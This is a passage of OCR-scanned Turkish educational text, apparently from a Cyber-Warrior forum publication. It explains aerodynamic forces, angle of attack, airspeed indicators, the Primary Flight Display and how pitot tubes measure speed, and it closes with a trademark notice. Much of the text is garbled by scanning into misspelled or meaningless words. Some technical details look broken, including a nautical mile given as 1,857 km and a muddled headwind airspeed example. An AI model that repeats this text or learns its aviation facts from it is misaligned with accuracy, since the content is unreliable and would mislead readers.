yükselebilir. NASA kaynağında bu durum şöyle açıklarımış 


NN a, Bir uçoğm kanatlarının şekli, 





— Fasier gir, alçak basarış uçması Oo soğlayon Oo şeyair. 
i ji üne praisıne Uçakların kanatlar üstte kavisli 
ai | ve alta duha düzdür. Bu şekil, 
Zn (Left dör gi 
| hava akışını yukardan aşağıya 


— salam 


göre daha huzl hole getirir. 
Böylelikle OO konadr üstünde 
daho öz hovo bösmer olur. Bu 
i durum, komodin ve böğlr olduğu 
Siper sr, — uçağın yukarı hareket etmesini 
highzr PES  Yaymm haya 

ilemi bere süğlür. Havü DOSMICIM 
değiştirmek için kıvrımlı 
yapıları kullanmak, birçok vwrokto kuilanılan bir numaradır. Helikopter rotor konatior! 
(pervane) da bu durumu kullanır. Uçurtmaların kaldırma kuvveti de kıvrmk yapısındarı 
koynaklarır. Yelkenli tekneler bile bu konsepti kullanır. Bir teknenin yelkeni tıpkı bir konut 

gibidir. Yelkkenliyi hareket ettiren de budur.” 





Tüm bu hareketler içerisinde, takdir edersiniz ki uçağa etki eder bir de sürükleme, 
sürtünme kuvveti vardır. Roketlerin, mermllerin, uçak gövdelerinin ve sivri yapıda 
olmasının sebebi bu kuvveti minimuma İndirmek ve uçaklar için kanatlarda oluşarı 
kaldırma kuvvetine gövdenin aerodinamik yapısı ile de destek olmaktır. 
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“Sürükleme, bir şeyi yavaşlatmaya çalışan bir güçtür. Bir nesnenin hareket etmesini 
zorlaştırır. Suyun içinde yürümek veya koşmak, bumu haovodu yopmuaktarı dohu zordur. 
Bunun medeni, suyun havadan daha fazla sürüklenmeye neden olmasıdır. Bir nesnenin 
gekli de sürükleme miktarını değiştirir. Çoğu yuyvorok yüzey, düz olomordon doho © 
sürtünmeye sohiptir. Dar yöreyler genellikle geniş olanlardan doha 07 sürtünmeye 
sahiptir. Bir yüzeye ne kadar gok hova çorporsa, o kodaor forla sürükleme yapar.” 


Drag « 





Bu yüzden uçaklarda “angle of attack" kavramı vardır. Özetle, uçağa etki ederi rüzgarın 
etki yönü ile uçağı burnunun gösterdiği yön arasındaki açıya denir. Kalkışta uçaklar 
burnunu yukarı dikliğinde angle ol attack artar, bu sayede yukardaki açıklamada 
okuduğunuz gibi uçağın burun ve kanat ön kenarları değil, kanadın alt kısmı ve gövdenin 
altı hava akımına maruz kalarak uçağı yukarı İtmesini kolaylaştırır. Tabii bu rüzgar 
direncini de arttırdığı için hızlanmayı zorlaştırır. dolayısıyla bir uçağın en çok yakıl 
harcadığı kısım kalkış kısmıdır. O halde gelin bu ileri doğru hareketi sağlayan itme 
kuuvetine de bakalım. 


ltme Nedirr 


“İtme, sürüklemenin tersi olan kuvvettir. İtme, bir seyi ileri doğru hareket ettiren İtici 
kuvvettir. Bir uçağın ilerlemeye devam etmesi içir sürüklemeden daha fazla itme gücüne 
sahip olması gerekir. Küçük bir uçak, itme gücünü bir pervanecden olabilir. Doha büyük 


sürüklerime dolayisiyla yavaşlayan yere inene kodür uçabilir.” 


Yeterince rüzgarın Uçağın 
aerodinamik yüzeylerinden kayarak 
kaldırma kuvvetini oluşturabilmesi 
içiri, uçağın ileri doğru oldukça huzlı 
bir harekete ihtişam vardır. Bu 
hareket ve ihtiyaç duyuları kaldırma 
kuvveti küçük uçaklarda öz iken, 
büyük uçaklarda çok daha fazladır. 
Bu sebeple uçaklar, mümkün 
olduğunda rüzgara “karşı” kalkar ve 
inerler. Havalimanı pistlerindeki İriş 
ve kalkış yönleri, arılık olarak rüzgar 
değişimlerine göre belirlenir. Uçakların kalkış ve İniş performansına büyük ölçüde etki 





ei aelil e MİR ai dlelMeNiNelslelii 





HAVA SÜRATLERİ VE PITOT TUBE 
Değerli arkadaşlar, 


Hepimiz uçakların çok hızlı hareket ettiğini biliyoruz, ve günlük hayatımızda ban hızlar telaffuz ediyoruz. Konuya biraz daha 

aşina olarılar “deniz mili, knot” gibi birimleri de kullarınmar. Fakat hava süratleri hususunda iş biraz daha derin ve ayrıntılı. Bu 
sebeple, hem siirlere bir uçak için ölçülen/olçülebiler süratleri ve bu süratlerin ölçümünde kullarıları bilim ve teknolojiyi 
basitçe arılatacağımı. Yazıyı tamamen okursanız, artık bir uçak gördüğünüzde ya da bir uçağa bindiğinizde, uçağın hız kavramını 
anlamış olmarım hazzıyla koltuğunuza kurulabilir, hatta çevrenizdekilere caka satabilirsiniz :| . 


1 — SURAT GÖSTERGELERİ 


Kiymretli arkadaşlar, aşağıdaki iki görselden Ilki görece daha küçük uçaklarda ve eski teknolojilerde kullarıları bir “Alrapesd 
indicator” yani hava hizi göstergesidir. İkincisi ise, “glass sockpit” dediğimiz daha dijital altyapılı uçaklarda farklı versiyonlarını 
görebileceğiniz. Airbus ve Bosing gibi firmaların ticari yolcu uçaklarında ekseriyetle kullanılanı “Primary Fight Display (FFD)” 
isimli ama Uçuş göstergesidir. Bir PAD, uçağın süratı dişmmda piloturi ihtiyaç duyacağı bir çok veriyi tek ekranda sunmaktadır. 
Simdi geliri burları biraz tarımalımı. 


Mirspsad indicator üzerinde gördüğünüz sayılar, uçağın “knot” cinsinderi hevs 
süratini ifade eder. Beyaz, yeşil, sarı ve kırmızı olarak 3 farklı renkle işaretlenmiş 
alarılar görüyorsunuz. 


Yeşil alan, uçağını güvenli olarak seyredebileceği süratlerdir. Sarı alar, rüzgarsız sakin 
bir havada uçağın ani manevralar yapmadan kullanabileceği fakat dikkatli olurması 
gereken, uçağı “stress damage” denilen gerilim hasarı vermeye götürebilecek hiz 
alanıdır. Sarı alanın bitimindeki kırmızı çizgi (kimi göstergelerde bu çizgiden sonraki 
bölge komple kırmızı arka planla işoretlenir), uçağın maksimum güvenli süratidir, bu 
sürgtin Üzerine çıkmak uçağa büyük ihtimalle yapısal hasar verecektir. 





Sağ üstte, yeşil alanın üzerindeki beyaz işaretli alar ise, uçağın “full ap” seyir hiz 
araliğider. Yani uçak, kanatların altından açılıp yavaşlama/ek kaldırma kuvveti 
saglama amaçlarıyla iniş ve kalkışlarda kullanıları ilapları tamamen açtığında bu beyaz alan dalülinde seyredebilir. Flaplar full 
açıkken beyar alanını başlarıgıcınını altına inmek uçağı takatsir birakarak “stall” olmasına, yani düşmesine sebep olacakken, 
beyaz alanın ilerisine geçmek faplara ve kanatlara zarar verecektir. Flaplar kapalı iken işe inilebilecek en düşük sürat, yeşil 
alanın başladığı moktadır. 























Primary Flight Display'e bakalım şimdi de. Öncelikle, bu konunun sebebini 
oluşturan hız göstergesi, PFÜ'nin sol tarafında yer alır. Görselde “175” olarak 
okuduğunuz değer uçağın knots cinsinden hava süratidir. Hem soldaki, hem 
sağdaki hız göstergelerindeki değer "İmdicated Alrspeed” dediğimiz. uçağın 
hava basıncı İle ölçüler, düzeltilmemiş hava süratidir. Bunu detaylı olarak 
ayrıca anlatacağım. 


PFO'nin “olunda hir göstergesini hem bir cetvel olarak, hem de cetvelin 
ürerinde direkt sayı olarak görebilrsinir. Hemen cetvelin altında “GS 181" 
olarak belirtileri ise “Ground Spesd” yani uçağın yer süratidir. 


Bu uçak şu anda muhtemeleri inişe geçmiş, son yaklaşmaya varan bir uçak, bu 
yüzden düşük bir hırda ilerliyor. Ayrica, yine soldaki haz cetveli üperinde yeşi 
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hazin altında olması gerektiğini gösterir. Uçak şu anda 175knots hızda 10 
derecelik ilap açıklığı seviyesinde seyrediyor. KEF değerli, uçağın iniş yaparken eni son kullanacağı sor tap açıklığıdar. Soldaki 
Alrspegd indicator görselindeki ve kırmızı alanları burada da görüyoruz. İşlevleri aynıdır. Uçağın Irtlfasına ve flap açıklığına 
göre sarı ve kırmızı alanı hareket eder. Örneğiri bu uçak flapları full açarsa, şu anda 130 knots seviyesinde başlayan kırmızı alan 
muhtemelen 110 knots'a kadar düşecektir. 


PFDO'ndn sağ tarafındaki cetvel uçağını “feet” cinsinden Irtifası, hemen altındaki yeşil “29,92” İse uçağın irtitasının ölçüm şekliril 
belirbeyen, uçağa çevredeki hava basıncının değerini anlatan “İnehes of mercury” cinsinden değerdir. Yarıl şu arda uçak, 29.92 
in/hg hava basıncında (yaklaşık 1013 milibar) bir ortamda seyretmektedir. bu konunun detayına girmiyorum, ayrı bir makale 
konusudur :). 


PFD'nin en altındaki yarım daire şeklindeki gösterge, dünyanin manyetik kuzeyine göre uçağın yönünü gösterir. Ortadaki 
maâvi/turundu gösterge ise uçağın burnunun, yatay eksenine göre açısını gösterir, veni şu anda ucak 5 derecelik bir acı kadar 
burnumu hayaya kaldırmıştır, mavi alan gökyürünü turuncu alar şeri ifade eder, 


Kullarıları haz birimi, “knots”, deni; milidir. 1 deniz mili yaklaşık 1,857 km'ye denk gelir. Fakat süratlerin ifade ettiği şeyler 


farklıdır, burnu anlatacağım birazdan, 


Simdi gelelim uçağın hızı nasi ölçülür konusuna. 


2 - PITOT TUBE! 





Resimlerdeki boru gibi olan cihazlar, farklı uçakların farklı yerlerinde yer aları “pitot tube” denilen parçalardır. Yukarıda 
verdiğim hava sürat göstergelerine yarısıyan hızı bu tüpler ölçer. 


BONUS: Kendi çektiğim bir savaş Jeti fotoğrafı (Toulouse Havalimanı, Fransa) ve ucunda yer alan pitot tube: 


Mucidi olanı Henri Pitottan adını alan bu tüp, uçak havada 
A seyrederken içine dolan havanın akışkanlık hızından aldığı 
© dinamik basınç verisi ile, statik porttan gelen havanın iç 
duvarlara yaptığı sintik basinç verisi arasındaki f 
hesaplarıması yoluyla çalışır. Hesaplanan bu weri, göstergeye 
yukarıda bahsettiğim gibi “145 — indicated Airspesd” olarak 
Ya TSAF, 


Fakat, eğer karşıdan esen bir rüzgar varsa, bu tüpe giren hava 
akışını hızlandıracağı İçin örneğin uçak rüzgarsız havada 200kn 
hazla giderken karşdan J0krı hızda rüzgar sz. İşe |âŞ değeri 
180 olarak görülecektir. Ayrıca , | 

akışmas dolayısıyla veya uçağın burun üçi dolayısıyla 
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Bitti mi? Tabii ki hayır. : ) 


Eğer atmosfer ile ilgili biraz bilgiriiz varsa, hava yö 7 Lİ iz ig tiğlimi bilirsiniz. Dolayısıyla, uçağın 
irtitasi ve Binti Mi olarak hava sıcaklığı ile basınçtan lom EAS da doğru değeri ti töre olamk vermeyecektir. PAS değerini, uçağın 
“denir seviyesinde olar Mar şünebilirsinir. Bu sebeple, uçağın bulunduğu irtifaya göre son bir düreitme 
yapılarak TAS - Trua gramer vi edilir, İste uçağın havadaki gerçek süratini doğru olarak gösteren hız birimi budur | 















3 — PITOT TUBE VERİ TOPLAMA YÖNTEMİ 


Sirndi bir de, bilimsel olarak bakalım bu pitot tube nasıl veri topluyor. 


Video ingilizcedir, İngilizce alt yan içeriyor açabilirsiniz. İngilirce bilmeyenler için ise ben zaten yukarıda terimlerin isimlerini 
verdim, video sahibi şema üzerinde bunları gösteriyor, sadece izleyerek de anlamanız mümkün olacaktır. 
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Uyarı | 
Cyber-Warrior tescilli bir marka olup, 556 Sayılı Markaların Korunması Hakkında 
K.H.K'ye göre yasal olarak korunmaktadır. 

Cyber-Warrior'un Marka imajına zarar verici her türlü eylemde bulunan, yazı, 
yorum, sair içerikler barındıranlar hakkında 556 Sayılı kanunun ilgili hükümlerine 
göre yasal işlem başlatılmaktadır. 

Ayrıca Cyber-Warrior'a ait isim, marka ve logoların izinsiz kullanılması yine aynı 
kanun hükümlerine göre suç sayılmaktadır. Marka No : 2010 46588 Korunma 
Tarihi : 15.07.2010 
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